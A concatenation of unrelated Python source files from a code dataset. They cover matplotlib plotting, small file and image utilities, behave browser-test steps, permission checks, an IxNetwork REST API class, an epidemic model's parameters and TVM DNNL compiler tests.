        plt.plot(self.PU2[0],self.PU2[1],color="brown",marker="o")
        plot_walras,=plt.plot(self.EQ1[0],self.EQ1[1],color="green",marker="o")
        # annotation with the equilibrium coordinates, offset by dt
        plt.annotate("(%s;%s)"%(round(self.EQ1[0],2),round(self.EQ1[1],2)), xy=self.EQ1, xytext=(self.EQ1[0]+self.dt,self.EQ1[1]-self.dt))
        plt.title("Edgeworth Box")
        plt.legend([plot_pareto,plot_U1,plot_U2,plot_endow,plot_core,plot_walras,plot_budget,plot_U1_EQ,plot_U2_EQ]
                   ,["Pareto","U1 before trade","U2 before trade","Init. endow.","Core","Equilibrium","Budget constraint","U1 at eq.","U2 at eq."])
        # Axes description
        plt.xlabel("Units of 1-st good")
        plt.ylabel("Units of 2-nd good")
        if fname is not None:
            plt.savefig(fname)
            plt.close()
        else:
            plt.show(block=False)
| StarcoderdataPython |
3373620 | <gh_stars>1-10
import io
import pathlib
import numpy as np
import yaml
from matplotlib import pyplot
import functools
import inspect
import warnings
def yaml_load(s: str):
    """Parse a YAML document using ``BaseLoader``.

    BaseLoader performs no tag resolution: every scalar comes back as a
    plain string, which also makes it safe on untrusted input.
    """
    return yaml.load(s, Loader=yaml.BaseLoader)
def yaml_dump(obj: object) -> str:
    """Serialize ``obj`` to a YAML string in block (non-flow) style."""
    return yaml.dump(obj, default_flow_style=False)
def overlay_image_green(result: np.ndarray,
                        base: np.ndarray,
                        overlay: np.ndarray,
                        base_factor: float):
    """
    #### Overlays a map on an image

    Fills all three channels of ``result`` (in place) with the grayscale
    ``base`` scaled by ``base_factor``, then adds ``overlay`` -- normalized
    by its value range and weighted by ``1 - base_factor`` -- to the green
    channel.
    """
    dimmed = base * base_factor
    for channel in range(3):
        result[:, :, channel] = dimmed
    value_span = np.max(overlay) - np.min(overlay)
    result[:, :, 1] += (1 - base_factor) * 255 * overlay / value_span
def create_png(frame: np.ndarray):
    """
    #### Create a PNG from a numpy array.

    Returns an in-memory ``io.BytesIO`` buffer holding the frame rendered
    as a grayscale PNG.
    """
    buffer = io.BytesIO()
    pyplot.imsave(buffer, frame, format='png', cmap='gray')
    return buffer
def rm_tree(path_to_remove: pathlib.Path):
    """Recursively delete ``path_to_remove`` (a file or a directory tree)."""
    if not path_to_remove.is_dir():
        path_to_remove.unlink()
        return
    for child in path_to_remove.iterdir():
        if child.is_dir():
            rm_tree(child)
        else:
            child.unlink()
    path_to_remove.rmdir()
def deprecated(message: str):
    """
    Mark a class, a function or a class method as deprecated.

    The first call of the wrapped object emits a DeprecationWarning
    containing ``message``; subsequent calls are silent.
    """
    def decorator(deprecated_obj):
        target_kind = "class" if inspect.isclass(deprecated_obj) else "function"
        warning_msg = f"Deprecated {target_kind} [{deprecated_obj.__name__}]: {message}"
        already_warned = False

        @functools.wraps(deprecated_obj)
        def new_func(*args, **kwargs):
            nonlocal already_warned
            if not already_warned:
                # Temporarily force DeprecationWarning to be shown, since
                # it is ignored by default outside of __main__.
                warnings.simplefilter('always', DeprecationWarning)
                warnings.warn(
                    warning_msg,
                    category=DeprecationWarning,
                    stacklevel=2
                )
                warnings.simplefilter('default', DeprecationWarning)
                already_warned = True
            return deprecated_obj(*args, **kwargs)

        return new_func

    return decorator
| StarcoderdataPython |
1723890 | from germanium.static import *
from germanium.locators import StaticElementLocator
from behave import *
from features.steps.asserts import *
use_step_matcher("re")
# Behave step definitions exercising Germanium's S()/Css() locators; all
# functions are named ``step_impl`` as is conventional for behave steps.
@step(u'I search using S for (?P<locator>.*)')
def step_impl(context, locator):
    # Smoke check: building the locator and querying existence must not raise.
    print("Search for locator: %s" % locator)
    S(locator).exists()


@step(u"the selector '(.*?)' exists somewhere")
def step_impl(context, selector):
    # only_visible=False also matches elements that are present but hidden.
    assert S(selector).exists(only_visible=False)


@step(u"the selector '(.*?)' exists and is visible")
def step_impl(context, selector):
    assert S(selector).exists()


@step(u"the selector '(.*?)' doesn't exists at all")
def step_impl(context, selector):
    assert S(selector).not_exists(only_visible=False)


@step(u"the selector '(.*?)' doesn't exists as visible")
def step_impl(context, selector):
    # NOTE(review): this step uses Css() while its siblings use S() --
    # presumably equivalent for plain CSS strings; confirm intentional.
    assert Css(selector).not_exists()


@step(u'nothing happens')
def step_impl(context):
    # Intentional no-op placeholder step.
    pass
@step(u"I search using a nested locator for '(.*?)'")
def step_impl(context, selector):
    # S() accepts another locator instance as its argument; stash the
    # resolved element for later assertion steps.
    element = S(S(selector)).element()
    context.found_element = element


@step(u"I search using a callable that returns a CssSelector '(.*?)'")
def step_impl(context, selector):
    # S() also accepts a zero-argument callable producing a locator.
    def fn():
        return Css(selector)
    element = S(fn).element()
    context.found_element = element


@step(u"I search for the 3rd element that is an 'input'")
def step_impl(context):
    # element_list() is 0-indexed, hence index 2 for the 3rd match.
    element = S('input').element_list(2)
    context.found_element = element


@step(u"I create a StaticElementLocator with a single element: (.*?)")
def step_impl(context, selector):
    # Wrap an already-resolved element in a StaticElementLocator and keep
    # it on the context for the follow-up assertion steps.
    element = S(selector).element()
    context.static_element_locator = StaticElementLocator(get_germanium(), element)


@step(u"the StaticElementLocator has one element")
def step_impl(context):
    assert_true(context.static_element_locator, "The static element locator is not found. "
                                                "Call first: I create a StaticElementLocator with a single element")
    locator = context.static_element_locator
    assert_true(locator.element())


@step(u"the StaticElementLocator has no elements anymore")
def step_impl(context):
    # A static locator returns nothing once its element left the DOM.
    assert_true(context.static_element_locator, "The static element locator is not found. "
                                                "Call first: I create a StaticElementLocator with a single element")
    locator = context.static_element_locator
    assert_false(locator.element())
| StarcoderdataPython |
def is_associate_or_consultant_to_pipeline(user, pipeline):
    """Check if a user is an associate or consultant of a
    pipeline record.

    Returns False when the user has no employee record attached;
    otherwise True when the employee is the pipeline candidate's
    associate or consultant.
    """
    # A user with no employee assigned can never match.
    employee = getattr(user, 'as_employee', None)
    if not employee:
        return False

    candidate = pipeline.job_candidate
    # Leftover debug print() calls removed; compare the employee's primary
    # key against both roles on the candidate.
    if candidate.associate_id and candidate.associate_id == employee.pk:
        return True
    if candidate.consultant_id and candidate.consultant_id == employee.pk:
        return True
    return False
def is_allowed_to_view_or_edit_pipeline(user, pipeline):
    """Return True if user has permission to view all Pipelines
    OR is an associate or consultant of the Pipeline.
    """
    # Global permission short-circuits the per-record role check.
    return (user.has_perm('salespipes.view_all_pipelines')
            or is_associate_or_consultant_to_pipeline(user, pipeline))
| StarcoderdataPython |
195410 | # MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class DceNodeMacGroups(Base):
"""Sets the DCE Node MAC Groups for a particular DCE ISIS Network Range.
The DceNodeMacGroups class encapsulates a list of dceNodeMacGroups resources that are managed by the user.
A list of resources can be retrieved from the server using the DceNodeMacGroups.find() method.
The list can be managed by using the DceNodeMacGroups.add() and DceNodeMacGroups.remove() methods.
"""
__slots__ = ()
_SDM_NAME = 'dceNodeMacGroups'
_SDM_ATT_MAP = {
'IncludeMacGroups': 'includeMacGroups',
'InterGroupUnicastMacIncrement': 'interGroupUnicastMacIncrement',
'IntraGroupUnicastMacIncrement': 'intraGroupUnicastMacIncrement',
'MulticastAddressNodeStep': 'multicastAddressNodeStep',
'MulticastMacCount': 'multicastMacCount',
'MulticastMacStep': 'multicastMacStep',
'NoOfUnicastScrMacsPerMulicastMac': 'noOfUnicastScrMacsPerMulicastMac',
'SourceGroupMapping': 'sourceGroupMapping',
'StartMulticastMac': 'startMulticastMac',
'StartUnicastSourceMac': 'startUnicastSourceMac',
'UnicastAddressNodeStep': 'unicastAddressNodeStep',
'VlanId': 'vlanId',
}
    def __init__(self, parent):
        # Attach this resource proxy to its parent via the SDK Base class.
        super(DceNodeMacGroups, self).__init__(parent)
    # Auto-generated accessor pairs: each property reads or writes the REST
    # attribute named in _SDM_ATT_MAP through Base._get_attribute /
    # Base._set_attribute.
    @property
    def IncludeMacGroups(self):
        """
        Returns
        -------
        - bool: If true, includes MAC groups for this Network Range.
        """
        return self._get_attribute(self._SDM_ATT_MAP['IncludeMacGroups'])
    @IncludeMacGroups.setter
    def IncludeMacGroups(self, value):
        self._set_attribute(self._SDM_ATT_MAP['IncludeMacGroups'], value)
    @property
    def InterGroupUnicastMacIncrement(self):
        """
        Returns
        -------
        - str: The MAC address format of the Unicast MAC between one or more node groups.
        """
        return self._get_attribute(self._SDM_ATT_MAP['InterGroupUnicastMacIncrement'])
    @InterGroupUnicastMacIncrement.setter
    def InterGroupUnicastMacIncrement(self, value):
        self._set_attribute(self._SDM_ATT_MAP['InterGroupUnicastMacIncrement'], value)
    @property
    def IntraGroupUnicastMacIncrement(self):
        """
        Returns
        -------
        - str: The MAC address format of the Unicast MAC within a node group.
        """
        return self._get_attribute(self._SDM_ATT_MAP['IntraGroupUnicastMacIncrement'])
    @IntraGroupUnicastMacIncrement.setter
    def IntraGroupUnicastMacIncrement(self, value):
        self._set_attribute(self._SDM_ATT_MAP['IntraGroupUnicastMacIncrement'], value)
    @property
    def MulticastAddressNodeStep(self):
        """
        Returns
        -------
        - str: The Multicast MAC address that configures the increment across the Network Range simulated RBridges.
        """
        return self._get_attribute(self._SDM_ATT_MAP['MulticastAddressNodeStep'])
    @MulticastAddressNodeStep.setter
    def MulticastAddressNodeStep(self, value):
        self._set_attribute(self._SDM_ATT_MAP['MulticastAddressNodeStep'], value)
    @property
    def MulticastMacCount(self):
        """
        Returns
        -------
        - number: The number of Multicast MAC addresses.
        """
        return self._get_attribute(self._SDM_ATT_MAP['MulticastMacCount'])
    @MulticastMacCount.setter
    def MulticastMacCount(self, value):
        self._set_attribute(self._SDM_ATT_MAP['MulticastMacCount'], value)
    @property
    def MulticastMacStep(self):
        """
        Returns
        -------
        - str: The incremental value of Multicast MAC address.
        """
        return self._get_attribute(self._SDM_ATT_MAP['MulticastMacStep'])
    @MulticastMacStep.setter
    def MulticastMacStep(self, value):
        self._set_attribute(self._SDM_ATT_MAP['MulticastMacStep'], value)
    @property
    def NoOfUnicastScrMacsPerMulicastMac(self):
        """
        Returns
        -------
        - number: The number of Unicast Source for each Multicast MAC address.
        """
        return self._get_attribute(self._SDM_ATT_MAP['NoOfUnicastScrMacsPerMulicastMac'])
    @NoOfUnicastScrMacsPerMulicastMac.setter
    def NoOfUnicastScrMacsPerMulicastMac(self, value):
        self._set_attribute(self._SDM_ATT_MAP['NoOfUnicastScrMacsPerMulicastMac'], value)
    @property
    def SourceGroupMapping(self):
        """
        Returns
        -------
        - str(fullyMeshed | oneToOne | manualMapping): The Source Group mapping type.
        """
        return self._get_attribute(self._SDM_ATT_MAP['SourceGroupMapping'])
    @SourceGroupMapping.setter
    def SourceGroupMapping(self, value):
        self._set_attribute(self._SDM_ATT_MAP['SourceGroupMapping'], value)
@property
def StartMulticastMac(self):
"""
Returns
-------
- str: The MAC address format of the starting Multicast MAC.
"""
return self._get_attribute(self._SDM_ATT_MAP['StartMulticastMac'])
@StartMulticastMac.setter
def StartMulticastMac(self, value):
self._set_attribute(self._SDM_ATT_MAP['StartMulticastMac'], value)
@property
def StartUnicastSourceMac(self):
"""
Returns
-------
- str: The MAC address format of the starting Unicast Source MAC.
"""
return self._get_attribute(self._SDM_ATT_MAP['StartUnicastSourceMac'])
@StartUnicastSourceMac.setter
def StartUnicastSourceMac(self, value):
self._set_attribute(self._SDM_ATT_MAP['StartUnicastSourceMac'], value)
@property
def UnicastAddressNodeStep(self):
"""
Returns
-------
- str: The Unicast MAC address that configures the increment across the Network Range simulated RBridges.
"""
return self._get_attribute(self._SDM_ATT_MAP['UnicastAddressNodeStep'])
@UnicastAddressNodeStep.setter
def UnicastAddressNodeStep(self, value):
self._set_attribute(self._SDM_ATT_MAP['UnicastAddressNodeStep'], value)
@property
def VlanId(self):
"""
Returns
-------
- number: The VLAN ID of the enabled Multicast MAC Range.
"""
return self._get_attribute(self._SDM_ATT_MAP['VlanId'])
@VlanId.setter
def VlanId(self, value):
self._set_attribute(self._SDM_ATT_MAP['VlanId'], value)
def update(self, IncludeMacGroups=None, InterGroupUnicastMacIncrement=None, IntraGroupUnicastMacIncrement=None, MulticastAddressNodeStep=None, MulticastMacCount=None, MulticastMacStep=None, NoOfUnicastScrMacsPerMulicastMac=None, SourceGroupMapping=None, StartMulticastMac=None, StartUnicastSourceMac=None, UnicastAddressNodeStep=None, VlanId=None):
    """Updates dceNodeMacGroups resource on the server.

    Args
    ----
    - IncludeMacGroups (bool): If true, includes MAC groups for this Network Range.
    - InterGroupUnicastMacIncrement (str): The MAC address format of the Unicast MAC between one or more node groups.
    - IntraGroupUnicastMacIncrement (str): The MAC address format of the Unicast MAC within a node group.
    - MulticastAddressNodeStep (str): The Multicast MAC address that configures the increment across the Network Range simulated RBridges.
    - MulticastMacCount (number): The number of Multicast MAC addresses.
    - MulticastMacStep (str): The incremental value of Multicast MAC address.
    - NoOfUnicastScrMacsPerMulicastMac (number): The number of Unicast Source for each Multicast MAC address.
    - SourceGroupMapping (str(fullyMeshed | oneToOne | manualMapping)): The Source Group mapping type.
    - StartMulticastMac (str): The MAC address format of the starting Multicast MAC.
    - StartUnicastSourceMac (str): The MAC address format of the starting Unicast Source MAC.
    - UnicastAddressNodeStep (str): The Unicast MAC address that configures the increment across the Network Range simulated RBridges.
    - VlanId (number): The VLAN ID of the enabled Multicast MAC Range.

    Raises
    ------
    - ServerError: The server has encountered an uncategorized error condition
    """
    # _map_locals presumably drops arguments left at None -- confirm in the base class.
    return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))

def add(self, IncludeMacGroups=None, InterGroupUnicastMacIncrement=None, IntraGroupUnicastMacIncrement=None, MulticastAddressNodeStep=None, MulticastMacCount=None, MulticastMacStep=None, NoOfUnicastScrMacsPerMulicastMac=None, SourceGroupMapping=None, StartMulticastMac=None, StartUnicastSourceMac=None, UnicastAddressNodeStep=None, VlanId=None):
    """Adds a new dceNodeMacGroups resource on the server and adds it to the container.

    Args
    ----
    - IncludeMacGroups (bool): If true, includes MAC groups for this Network Range.
    - InterGroupUnicastMacIncrement (str): The MAC address format of the Unicast MAC between one or more node groups.
    - IntraGroupUnicastMacIncrement (str): The MAC address format of the Unicast MAC within a node group.
    - MulticastAddressNodeStep (str): The Multicast MAC address that configures the increment across the Network Range simulated RBridges.
    - MulticastMacCount (number): The number of Multicast MAC addresses.
    - MulticastMacStep (str): The incremental value of Multicast MAC address.
    - NoOfUnicastScrMacsPerMulicastMac (number): The number of Unicast Source for each Multicast MAC address.
    - SourceGroupMapping (str(fullyMeshed | oneToOne | manualMapping)): The Source Group mapping type.
    - StartMulticastMac (str): The MAC address format of the starting Multicast MAC.
    - StartUnicastSourceMac (str): The MAC address format of the starting Unicast Source MAC.
    - UnicastAddressNodeStep (str): The Unicast MAC address that configures the increment across the Network Range simulated RBridges.
    - VlanId (number): The VLAN ID of the enabled Multicast MAC Range.

    Returns
    -------
    - self: This instance with all currently retrieved dceNodeMacGroups resources using find and the newly added dceNodeMacGroups resources available through an iterator or index

    Raises
    ------
    - ServerError: The server has encountered an uncategorized error condition
    """
    return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))

def remove(self):
    """Deletes all the contained dceNodeMacGroups resources in this instance from the server.

    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    self._delete()

def find(self, IncludeMacGroups=None, InterGroupUnicastMacIncrement=None, IntraGroupUnicastMacIncrement=None, MulticastAddressNodeStep=None, MulticastMacCount=None, MulticastMacStep=None, NoOfUnicastScrMacsPerMulicastMac=None, SourceGroupMapping=None, StartMulticastMac=None, StartUnicastSourceMac=None, UnicastAddressNodeStep=None, VlanId=None):
    """Finds and retrieves dceNodeMacGroups resources from the server.

    All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve dceNodeMacGroups resources from the server.
    To retrieve an exact match ensure the parameter value starts with ^ and ends with $
    By default the find method takes no parameters and will retrieve all dceNodeMacGroups resources from the server.

    Args
    ----
    - IncludeMacGroups (bool): If true, includes MAC groups for this Network Range.
    - InterGroupUnicastMacIncrement (str): The MAC address format of the Unicast MAC between one or more node groups.
    - IntraGroupUnicastMacIncrement (str): The MAC address format of the Unicast MAC within a node group.
    - MulticastAddressNodeStep (str): The Multicast MAC address that configures the increment across the Network Range simulated RBridges.
    - MulticastMacCount (number): The number of Multicast MAC addresses.
    - MulticastMacStep (str): The incremental value of Multicast MAC address.
    - NoOfUnicastScrMacsPerMulicastMac (number): The number of Unicast Source for each Multicast MAC address.
    - SourceGroupMapping (str(fullyMeshed | oneToOne | manualMapping)): The Source Group mapping type.
    - StartMulticastMac (str): The MAC address format of the starting Multicast MAC.
    - StartUnicastSourceMac (str): The MAC address format of the starting Unicast Source MAC.
    - UnicastAddressNodeStep (str): The Unicast MAC address that configures the increment across the Network Range simulated RBridges.
    - VlanId (number): The VLAN ID of the enabled Multicast MAC Range.

    Returns
    -------
    - self: This instance with matching dceNodeMacGroups resources retrieved from the server available through an iterator or index

    Raises
    ------
    - ServerError: The server has encountered an uncategorized error condition
    """
    return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))

def read(self, href):
    """Retrieves a single instance of dceNodeMacGroups data from the server.

    Args
    ----
    - href (str): An href to the instance to be retrieved

    Returns
    -------
    - self: This instance with the dceNodeMacGroups resources from the server available through an iterator or index

    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    return self._read(href)
| StarcoderdataPython |
1653864 | <gh_stars>1-10
from six import raise_from
import numpy as np
def assert_close(a, b, atol=1.e-8):
    """Assert that scalars *a* and *b* are equal within absolute tolerance *atol*."""
    try:
        close = np.allclose([a], [b], atol=atol)
        assert close
    except AssertionError as e:
        message = 'expected %s to be close to %s (atol=%s)' % (a, b, atol)
        raise_from(AssertionError(message), e)

def assert_all_close(a, b, atol=1.e-8):
    """Assert that arrays *a* and *b* are element-wise close within *atol*."""
    try:
        close = np.allclose(a, b, atol=atol)
        assert close
    except AssertionError as e:
        message = 'expected %s to be close to %s (atol=%s)' % (a, b, atol)
        raise_from(AssertionError(message), e)

def assert_all_not_close(a, b, atol=1.e-8):
    """Assert that arrays *a* and *b* are NOT element-wise close within *atol*."""
    try:
        close = np.allclose(a, b, atol=atol)
        assert not close
    except AssertionError as e:
        message = 'expected %s not to be close to %s (atol=%s)' % (a, b, atol)
        raise_from(AssertionError(message), e)
| StarcoderdataPython |
3336752 | '''Defines the parameters we will use in the model'''
from numpy import array, arange, concatenate, diag, linspace, ones, where, zeros
from pandas import read_excel, read_csv
from scipy.integrate import solve_ivp
from model.preprocessing import (
make_aggregator, aggregate_contact_matrix,
aggregate_vector_quantities)
from model.common import sparse, hh_ODE_rates
# Age-structured contact matrices for the UK (household-only and
# all-locations), given in 5-year age bands in the source spreadsheets.
k_home = read_excel(
    'inputs/MUestimates_home_2.xlsx',
    sheet_name='United Kingdom of Great Britain',
    header=None).to_numpy()
k_all = read_excel(
    'inputs/MUestimates_all_locations_2.xlsx',
    sheet_name='United Kingdom of Great Britain',
    header=None).to_numpy()
# Because we want 80 to be included as well.
fine_bds = arange(0, 81, 5)
# Coarse bands: 5-year bands up to age 25, one wide 25-60 band, then
# 5-year bands from 60 to 80 (see the slice indices).
coarse_bds = concatenate((fine_bds[:6], fine_bds[12:]))
pop_pyramid = read_csv(
    'inputs/United Kingdom-2019.csv', index_col=0)
# Combine male and female counts into a single total per age band.
pop_pyramid = (pop_pyramid['F'] + pop_pyramid['M']).to_numpy()
# Population-weight the matrices down onto the coarse age bands.
k_home = aggregate_contact_matrix(k_home, fine_bds, coarse_bds, pop_pyramid)
k_all = aggregate_contact_matrix(k_all, fine_bds, coarse_bds, pop_pyramid)
# External (non-household) contacts = all contacts minus household contacts.
k_ext = k_all - k_home
# This is in ten year blocks
rho = read_csv(
    'inputs/rho_estimate_cdc.csv', header=None).to_numpy().flatten()
cdc_bds = arange(0, 81, 10)
aggregator = make_aggregator(cdc_bds, fine_bds)
# This is in five year blocks
rho = sparse(
    (rho[aggregator], (arange(len(aggregator)), [0]*len(aggregator))))
# gamma is presumably the recovery rate (1 / mean infectious period) and
# alpha below 1 / latent period -- confirm against the model definition.
gamma = 1.0/2.0
R0 = 2.4
rho = gamma * R0 * aggregate_vector_quantities(
    rho, fine_bds, coarse_bds, pop_pyramid).toarray().squeeze()
# Detection probability proportional to rho, rescaled so its maximum is 0.9.
det = (0.9/max(rho)) * rho
params = {'R0' : R0,
          'gamma' : gamma,
          'alpha' : 1.0/5.0,
          'det' : det,
          'sigma' : rho / det,
          'tau' : 0.0 * ones(len(rho)),
          'k_home' : k_home,
          'k_ext' : k_ext,
          'coarse_bds' : coarse_bds
          }
| StarcoderdataPython |
176047 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import numpy as np
import pytest
import itertools
import tvm
import tvm.relay.testing
from tvm import relay
from tvm.relay.op.contrib import dnnl
import tvm.testing
# Skip marker: applied when TVM was built without the DNNL BYOC codegen.
has_dnnl_codegen = pytest.mark.skipif(
    not tvm.get_global_func("relay.ext.dnnl", True), reason="DNNL codegen not available"
)
# Parametrize every test twice: compile-only (False) and compile+run (True).
run_module = tvm.testing.parameter(
    pytest.param(False, marks=[has_dnnl_codegen, *tvm.testing.requires_llvm()]),
    pytest.param(True, marks=[has_dnnl_codegen, *tvm.testing.requires_llvm()]),
    ids=["compile", "run"],
)
def vmobj_to_list(o):
    """Recursively flatten a TVM runtime result into nested lists of numpy arrays."""
    if isinstance(o, tvm.nd.NDArray):
        return [o.numpy()]
    if isinstance(o, (tvm.runtime.container.ADT, list)):
        return [vmobj_to_list(item) for item in o]
    raise RuntimeError("Unknown object type: %s" % type(o))
def assert_result_dict_holds(result_dict):
    """Check that every pair of entries in *result_dict* is numerically close."""
    for left_key, right_key in itertools.combinations(result_dict, 2):
        left = vmobj_to_list(result_dict[left_key])
        right = vmobj_to_list(result_dict[right_key])
        for left_res, right_res in zip(left, right):
            tvm.testing.assert_allclose(left_res, right_res, rtol=1e-3, atol=1e-3)
def run_and_verify(mod, input, params, target, run_module):
    """Build *mod* with and without DNNL partitioning under both the graph
    and vm executors, run all four variants (when *run_module* is True) and
    check their outputs agree.

    Parameters
    ----------
    mod : tvm.IRModule        The unpartitioned module under test.
    input : dict | NDArray    Runtime input(s); a dict is splatted as kwargs.
    params : dict             Bound parameter tensors.
    target : str              Build target (e.g. "llvm").
    run_module : bool         If True, execute and compare; otherwise compile only.
    """
    def check_dnnl_used(mod):
        # NOTE(review): defined but never invoked -- presumably meant to assert
        # that partitioning produced at least one dnnl subgraph; confirm intent.
        num_dnnl_subgraphs = sum(
            [1 if "dnnl" in gv.name_hint else 0 for gv in mod.get_global_vars()]
        )
        assert num_dnnl_subgraphs >= 1

    dev = tvm.cpu()
    result_dict = dict()
    # Bug fix: partition into a separate variable instead of rebinding `mod`
    # inside the loop.  Previously `mod = dnnl.partition_for_dnnl(mod, params)`
    # leaked the partitioned module into the following iterations, so the
    # non-DNNL "vm" baseline silently ran the DNNL-partitioned module (and it
    # was partitioned a second time on the next use_dnnl=True pass).
    partitioned_mod = dnnl.partition_for_dnnl(mod, params)
    for mode in ["graph", "vm"]:
        for use_dnnl in [False, True]:
            result_key = mode + ("_dnnl" if use_dnnl else "")
            active_mod = partitioned_mod if use_dnnl else mod
            with tvm.transform.PassContext(opt_level=3):
                func = relay.create_executor(
                    mode, mod=active_mod, device=dev, target=target
                ).evaluate()
            if run_module:
                if isinstance(input, dict):
                    result_dict[result_key] = func(**input, **params)
                else:
                    result_dict[result_key] = func(input, **params)
    if run_module:
        assert_result_dict_holds(result_dict)
def run_and_verify_func(config, run_module, target="llvm", dtype="float32"):
    """Test a Relay func by compiling, running, and comparing TVM and DNNL outputs.

    Parameters
    ----------
    config : Tuple[relay.Function, Dict[str, NDArray], List[str]]
        A tuple containing 1) The function to test, 2) A dictionary of var names to input shapes and
        3) A list of which vars should be considered params.
    run_module: bool
        If True, the built module will be run after being compiled.
    """
    f, input_shapes, is_param = config
    # Vars listed in is_param become bound parameters with fixed random
    # values; the remaining vars become runtime inputs.
    params = {x: np.random.uniform(-1, 1, input_shapes[x]).astype(dtype) for x in is_param}
    input_dict = {
        k: np.random.uniform(-1, 1, v).astype(dtype)
        for k, v in input_shapes.items()
        if k not in is_param
    }
    run_and_verify(f, input_dict, params, target, run_module)
def get_conv2d(
    x_shape=(1, 32, 8, 8),
    k_shape=(16, 32, 3, 3),
    groups=1,
    padding=(0, 0),
    strides=(1, 1),
    dilation=(1, 1),
    activation=None,
    dtype="float32",
):
    """Build a relay conv2d, optionally followed by an activation.

    Returns a tuple of (relay expression, {var name: shape}, param name list).
    An unrecognized *activation* string is treated the same as None.
    """
    x = relay.var("x", shape=(x_shape), dtype=dtype)
    kernel = relay.var("kernel", shape=(k_shape), dtype=dtype)
    out = relay.nn.conv2d(
        x,
        kernel,
        kernel_size=k_shape[2:4],
        groups=groups,
        padding=padding,
        strides=strides,
        dilation=dilation,
        channels=k_shape[0],
    )
    dic = {"x": x_shape, "kernel": k_shape}
    param_lst = ["kernel"]
    activations = {
        "relu": relay.nn.relu,
        "tanh": relay.tanh,
        "sigmoid": relay.sigmoid,
    }
    act_fn = activations.get(activation)
    if act_fn is not None:
        return act_fn(out), dic, param_lst
    return out, dic, param_lst
def get_conv2d_weights_const(
    x_shape=(1, 32, 8, 8),
    k_shape=(16, 32, 3, 3),
    groups=1,
    padding=(0, 0),
    strides=(1, 1),
    dilation=(1, 1),
    dtype="float32",
):
    """conv2d whose kernel is a relay constant (all ones) instead of a free
    var, so only ``x`` remains as a runtime input and param_lst is empty."""
    x = relay.var("x", shape=(x_shape), dtype=dtype)
    kernel = relay.const(np.ones(k_shape).astype(dtype))
    out = relay.nn.conv2d(
        x,
        kernel,
        channels=k_shape[0],
        kernel_size=k_shape[2:4],
        groups=groups,
        padding=padding,
        strides=strides,
        dilation=dilation,
    )
    dic = {"x": x_shape}
    param_lst = []
    return out, dic, param_lst

def get_conv2d_bias(
    x_shape=(1, 32, 8, 8), k_shape=(16, 32, 3, 3), activation=None, dtype="float32"
):
    """conv2d + bias_add, optionally followed by relu/tanh/sigmoid."""
    conv, dic, param_lst = get_conv2d(x_shape=x_shape, k_shape=k_shape, dtype=dtype)
    bias = relay.var("bias", shape=(k_shape[0],), dtype=dtype)
    out = relay.nn.bias_add(conv, bias)
    dic["bias"] = (k_shape[0],)
    param_lst += ["bias"]
    if activation == "relu":
        return relay.nn.relu(out), dic, param_lst
    elif activation == "tanh":
        return relay.tanh(out), dic, param_lst
    elif activation == "sigmoid":
        return relay.sigmoid(out), dic, param_lst
    else:
        return out, dic, param_lst

def get_conv2d_bias_bn_relu(x_shape=(1, 32, 8, 8), k_shape=(16, 32, 3, 3), dtype="float32"):
    """conv2d + bias followed by batch_norm and relu (conv+bias+bn+relu pattern)."""
    conv2d_bias, dic, param_lst = get_conv2d_bias(x_shape, k_shape, dtype=dtype)
    # BN parameters gamma=1, beta=0, mean=0, var=1: a (near-)identity transform.
    beta = relay.const(np.zeros(k_shape[0]).astype(dtype))
    gamma = relay.const(np.ones(k_shape[0]).astype(dtype))
    moving_mean = relay.const(np.zeros(k_shape[0]).astype(dtype))
    moving_var = relay.const(np.ones(k_shape[0]).astype(dtype))
    conv2d_bias_bn, _, _ = relay.nn.batch_norm(
        conv2d_bias,
        gamma=gamma,
        beta=beta,
        moving_mean=moving_mean,
        moving_var=moving_var,
        axis=1,
        center=True,
        scale=True,
        epsilon=1e-5,
    )
    return relay.nn.relu(conv2d_bias_bn), dic, param_lst
def get_dense(x_shape=(1, 16), k_shape=(32, 16), activation=None, dtype="float32"):
    """Dense (matmul) layer with a free-var kernel.

    NOTE(review): ``activation`` is accepted but never applied -- confirm
    whether fused-activation variants were intended here.
    """
    x = relay.var("x", shape=(x_shape), dtype=dtype)
    kernel = relay.var("kernel", shape=(k_shape), dtype=dtype)
    out = relay.nn.dense(x, kernel, units=k_shape[0])
    dic = {"x": x_shape, "kernel": k_shape}
    param_lst = ["kernel"]
    return out, dic, param_lst

def get_dense_bias(x_shape=(1, 16), k_shape=(32, 16), activation=None, dtype="float32"):
    """Dense + bias_add.  ``activation`` is likewise accepted but unused."""
